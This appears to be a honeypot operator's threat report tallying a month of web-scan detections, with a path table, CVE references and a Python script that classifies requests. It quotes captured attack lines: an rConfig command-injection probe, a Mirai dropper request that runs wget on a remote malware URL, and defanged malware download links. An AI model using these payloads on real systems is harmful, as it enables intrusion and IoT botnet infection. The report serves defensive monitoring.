[Honeypot Quick Analysis] Honeypot quick analysis (10/11-11/16)
It has been quite a while since the last update.
Due to a mistake on my part, part of the logs were lost (the WoWHoneypot and Honeytrap logs), so this update covers WoWHoneypot only.
◾️WoWHoneypot
<Detections by country and total detections>

<Detection count by target>
| target | count |
|---|---|
| WordPress | 1639 |
| - | 876 |
| FreePBX | 438 |
| txt | 116 |
| Admin config | 113 |
| Tomcat | 76 |
| phpMyAdmin | 43 |
| ThinkPHP | 41 |
| Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API | 32 |
| Unauthorized Relay | 14 |
| Webshell | 11 |
| phpMyAdmin | 10 |
| a2billing | 8 |
| Nmap | 7 |
| D-Link DIR-850L | 3 |
| consul | 3 |
| Vmware | 2 |
| .env file | 1 |
| ASUS | 1 |
| Drupal | 1 |
| IPC | 1 |
| Login Page | 1 |
| MySQL | 1 |
| Outlook 2016 Autodiscover | 1 |
| Scanner | 1 |
| Trane Tracer SC | 1 |
| rConfig | 1 |
<rConfig vulnerability>
CVE-2019-16663 and CVE-2019-16662
Detected payload
/install/lib/ajaxhandlers/ajaxserversettingschk.php?rootuname=;echo -n hellorconfig|md5sum #
→ Everything after rootuname=; is executed as a shell command. In this case the command uses echo to compute the MD5 hash of the string hellorconfig. A hash in the response means the injection worked, so once the attacker sees the hash they presumably move on to the next stage of the attack.
<Malware downloads>
hxxp://fky[.]dfg45dfg45[.]best/download[.]exe
https://www.virustotal.com/gui/file/7ee4f2381f5e06e3808455bec411ba1735688ee9269ce74d1ef1cd9fa0bee95f/detection
→ Downloader
Request: GET /FxCodeShell.jsp
An attack that tries to have a webshell install the downloader.
hxxp://5[.]206[.]227[.]65/arm7[.]tsunami
https://www.virustotal.com/gui/file/4a3e9fd386272aadc1d15157cad96db4ed1c41ef44f28b04eea4310dd4ae4439/detection
→ Mirai variant (tsunami)
Request: GET /shell?cd+/tmp;rm+-rf+.t;wget <malware URL>
This traffic targets IoT devices such as the MVPower DVR and was aimed at infecting them with a Mirai variant. (As expected, IoT-related traffic is dominated by Mirai-family downloads...)
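As an added example (not part of the original post, and not WoWHoneypot's own log format), the following Python triage script applies the path signatures listed in this report to constructed request lines, labels each request the way the tables here do, and pulls the injected command out of the two command-injection shapes described above: rConfig's rootuname=; parameter and the MVPower DVR /shell? request. The line format, TEST-NET source IPs and the wget URL are constructed placeholders.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus
# Signatures built from the paths listed in this report; first match wins.
SIGNATURES = [
    ("rConfig", re.compile(r"/ajaxhandlers/ajaxserversettingschk\.php")),
    ("MVPower DVR", re.compile(r"^/shell\?")),
    ("Webshell", re.compile(r"/FxCodeShell\.jsp|/l\.php$")),
    ("phpMyAdmin", re.compile(r"/scripts/setup\.php|/phpmyadmin|/pma/", re.I)),
    ("Nmap", re.compile(r"nmap(lower|upper)?check|/Nmap/folder/check|Trinity\.txt\.bak", re.I)),
    ("WordPress", re.compile(r"/wp-login\.php|/wp-admin/|/xmlrpc\.php|/wp-json/")),
    ("Unauthorized Relay", re.compile(r"^https?://|^[\w.-]+:\d+$", re.I)),
]
def classify(target):
    """Map a request target to the label used in this report ('-' if none)."""
    for label, pattern in SIGNATURES:
        if pattern.search(target):
            return label
    return "-"
def injected_command(target):
    """Shell command carried by rConfig's rootuname=;<cmd> or MVPower's /shell?<cmd>."""
    m = re.search(r"[?&]rootuname=([^&]*)", target)
    if m and unquote_plus(m.group(1)).startswith(";"):
        return unquote_plus(m.group(1))[1:].strip()
    if target.startswith("/shell?"):
        return unquote_plus(target[len("/shell?"):]).strip()
    return None
# Constructed sample lines '<src_ip> "<request line>"' (TEST-NET IPs, placeholder URL).
SAMPLE_LOG = [
    '192.0.2.10 "GET /install/lib/ajaxhandlers/ajaxserversettingschk.php?rootuname=;echo -n hellorconfig|md5sum # HTTP/1.1"',
    '192.0.2.11 "GET /shell?cd+/tmp;rm+-rf+.t;wget+http://malware-url.invalid/arm7.tsunami HTTP/1.1"',
    '192.0.2.12 "GET /pma/scripts/setup.php HTTP/1.1"',
    '192.0.2.13 "GET /nmaplowercheck1573311458 HTTP/1.1"',
    '192.0.2.14 "CONNECT www.example.com:443 HTTP/1.1"',
    '192.0.2.15 "GET /favicon.ico HTTP/1.1"',
]
def summarize(lines):
    """Return (Counter of labels, [(ip, label, command)] for injection attempts)."""
    counts, injections = Counter(), []
    for line in lines:
        m = re.match(r'^(\S+) "(\w+) (.+?) HTTP/', line)
        if not m: continue
        ip, method, target = m.groups()
        # A CONNECT request is a relay attempt regardless of the path signatures.
        label = "Unauthorized Relay" if method == "CONNECT" else classify(target)
        counts[label] += 1
        cmd = injected_command(target)
        if cmd:
            injections.append((ip, label, cmd))
    return counts, injections
```

The injection list is the part worth a human look: it tells you which sources sent a command rather than a plain scan path, and what that command tried to fetch.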
<Detected path list>
| path | target | CVE | reference | count |
|---|---|---|---|---|
| /editBlackAndWhiteList | Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API | - | https://github.com/mcw0/PoC/blob/master/TVT-PoC.py | 8 |
| /myadmin/scripts/setup.php | phpMyAdmin | - | - | 8 |
| /pma/scripts/setup.php | phpMyAdmin | - | - | 8 |
| /recordings/theme/main.css | FreePBX | - | - | 4 |
| /recordings/theme/main.css | FreePBX | - | https://github.com/crazedr0m/FreePBX/blob/master/upgrades/2.8.1.md5 | 4 |
| /admin/i18n/readme.txt | - | - | - | 2 |
| /admin/i18n/readme.txt | txt | - | - | 2 |
| / | - | - | - | 1 |
| / index.php | - | - | - | 1 |
| / l.php | Webshell | - | - | 1 |
| / phpinfo.php | - | - | - | 1 |
| /.env | .env file | - | - | 1 |
| /// | - | - | - | 1 |
| ///wp-json/wp/v2/users/ | WordPress | - | - | 1 |
| //MyAdmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
| //myadmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
| //phpMyAdmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
| //phpmyadmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
| //pma/scripts/setup.php | phpMyAdmin | - | - | 1 |
| /Autodiscover/Autodiscover.xml | Outlook 2016 Autodiscover | - | - | 1 |
| /FxCodeShell.jsp | Webshell | - | - | 1 |
| /HNAP1 | D-Link DIR-850L | CVE-2015-2051 | https://www.morihi-soc.net/?p=981 | 1 |
| /HNAP1/ | D-Link DIR-850L | CVE-2015-2051 | https://www.morihi-soc.net/?p=981 | 1 |
| /Login.htm | - | - | - | 1 |
| /MyAdmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
| /Nmap/folder/check1573311458 | Nmap | - | - | 1 |
| /Nmap/folder/check1573531681 | Nmap | - | - | 1 |
| /NmapUpperCheck1573311458 | Nmap | - | - | 1 |
| /NmapUpperCheck1573531681 | Nmap | - | - | 1 |
| /Pages/login.htm | - | - | - | 1 |
| /TP/public/index.php | ThinkPHP | - | - | 1 |
| /a2billing/admin/Public/index.php | a2billing | - | http://www.asterisk2billing.org/ | 1 |
| /a2billing/customer/templates/default/css/menu.css | FreePBX | - | https://n-lab.site/?p=494 | 1 |
| /admin/assets/js/views/login.js | FreePBX | - | https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 | 1 |
| /admin/config.php | Admin config | - | - | 1 |
| /admin/phpmyadmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
| /admin/pma/scripts/setup.php | phpMyAdmin | - | - | 1 |
| /admin/scripts/setup.php | phpMyAdmin | - | - | 1 |
| /cgi-sys/defaultwebpage.cgi | - | - | - | 1 |
| /cpanel | - | - | - | 1 |
| /db/scripts/setup.php | phpMyAdmin | - | - | 1 |
| /dbadmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
| /evox/about | Trane Tracer SC | - | https://mogu2itachi.hatenablog.com/entry/2019/03/10/173327 | 1 |
| /favicon.ico | - | - | - | 1 |
| /get_webdavInfo.asp | ASUS RT-AC | CVE-2017-5892 | https://wwwsnightwatchcybersecuritycom.files.wordpress.com/2017/10/bsides_fall_2017.pdf | 1 |
| /getip | - | - | - | 1 |
| /index.php | - | - | - | 1 |
| /install/lib/ajaxhandlers/ajaxserversettingschk.php | rConfig | CVE-2019-16663, CVE-2019-16662 | https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/ | 1 |
| /ipc$ | IPC | - | https://thinline196.hatenablog.com/entry/2018/09/23/153019 | 1 |
| /l.php | Webshell | - | - | 1 |
| /login/ | Login Page | - | - | 1 |
| /manager/html | Tomcat | - | - | 1 |
| /manager/text/list | Tomcat | - | https://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html | 1 |
| /muieblackcat | Scanner | - | https://eromang.zataz.com/2011/08/14/suc027-muieblackcat-setup-php-web-scanner-robot/ | 1 |
| /mysql/scripts/setup.php | MySQL | - | - | 1 |
| /mysqladmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
| /nice ports,/Trinity.txt.bak | Nmap | - | https://dragos.com/blog/industry-news/threat-hunting-with-python-part-2-detecting-nmap-behavior-with-bro-http-logs/ | 1 |
| /nmaplowercheck1573311458 | Nmap | - | - | 1 |
| /nmaplowercheck1573531681 | Nmap | - | - | 1 |
| /phpMyAdmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
| /phpinfo.php | - | - | - | 1 |
| /phpmyadmin | phpMyAdmin | - | - | 1 |
| /phpmyadmin/ | phpMyAdmin | - | - | 1 |
| /phpmyadmin/ index.php | phpMyAdmin | - | - | 1 |
| /phpmyadmin// index.php | phpMyAdmin | - | - | 1 |
| /phpmyadmin// l.php | phpMyAdmin | - | - | 1 |
| /phpmyadmin// phpinfo.php | phpMyAdmin | - | - | 1 |
| /phpmyadmin//index.php | phpMyAdmin | - | - | 1 |
| /phpmyadmin//l.php | phpMyAdmin | - | - | 1 |
| /phpmyadmin//phpinfo.php | phpMyAdmin | - | - | 1 |
| /phpmyadmin//phpmyadmin/ index.php | phpMyAdmin | - | - | 1 |
| /phpmyadmin//phpmyadmin/index.php | phpMyAdmin | - | - | 1 |
| /phpmyadmin/index.php | phpMyAdmin | - | - | 1 |
| /phpmyadmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
| /pmd/ index.php | phpMyAdmin | - | - | 1 |
| /pmd/index.php | phpMyAdmin | - | - | 1 |
| /robots.txt | - | - | - | 1 |
| /scripts/setup.php | phpMyAdmin | - | - | 1 |
| /sdk | Vmware | - | https://github.com/nmap/nmap/blob/master/scripts/vmware-version.nse | 1 |
| /shell | Webshell | - | - | 1 |
| /user/register/ | Drupal | CVE-2018-7600 | https://www.orangeitems.com/entry/2018/04/14/084205 | 1 |
| /v1/agent/self | consul | - | https://github.com/hashicorp/consul/blob/master/api/agent.go | 1 |
| /w00tw00t.at.blackhats.romanian.anti-sec:) | phpMyAdmin | - | - | 1 |
| /wp-admin/ | WordPress | - | - | 1 |
| /wp-login.php | WordPress | - | - | 1 |
| /xmlrpc.php | WordPress | - | - | 1 |
| cn.bing.com:443 | Unauthorized Relay | - | - | 1 |
| hxxp://112[.]124.42.80:63435/ | Unauthorized Relay | - | - | 1 |
| hxxp://112[.]35.63.31:8088/index.php | Unauthorized Relay | - | - | 1 |
| hxxp://112[.]35.66.7:8088/index.php | Unauthorized Relay | - | - | 1 |
| hxxp://123[.]125.114.144/ | Unauthorized Relay | - | - | 1 |
| hxxp://www.123cha.com/ | Unauthorized Relay | - | - | 1 |
| hxxp://www.ip.cn/ | Unauthorized Relay | - | - | 1 |
| www[.]baidu.com:443 | Unauthorized Relay | - | - | 1 |
| www[.]ip.cn:443 | Unauthorized Relay | - | - | 1 |
| xui[.]ptlogin2.qq.com:443 | Unauthorized Relay | - | - | 1 |
That's all for this update.